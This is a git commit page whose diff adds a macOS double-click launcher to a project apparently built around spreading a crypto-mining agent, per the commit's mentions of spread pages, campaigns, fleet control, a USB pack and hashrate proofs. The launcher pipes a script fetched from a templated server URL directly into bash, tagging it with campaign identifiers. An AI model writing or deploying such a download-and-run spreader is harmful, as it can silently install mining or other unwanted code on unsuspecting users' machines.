feat: alive UI wave, galaxy presence, spread and fleet enhancements
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Dashboard ambient layer, comrade presence, Mission Deck and War Room, Emberwake supply chain, spread/docs publishing, fleet policy and modules API, CI docker mining, and refreshed USB pack.
This commit is contained in:
5
server/web/public/spread/install.command
Normal file
5
server/web/public/spread/install.command
Normal file
@@ -0,0 +1,5 @@
|
||||
#!/bin/bash
|
||||
# macOS double-click launcher — chmod +x install.command
|
||||
export AETHER_CAMPAIGN='{{CAMPAIGN}}'
|
||||
export AETHER_UTM='{{CAMPAIGN}}'
|
||||
curl -sL '{{SERVER_URL}}/install.command{{QUERY_SUFFIX}}' | bash
|
||||
Reference in New Issue
Block a user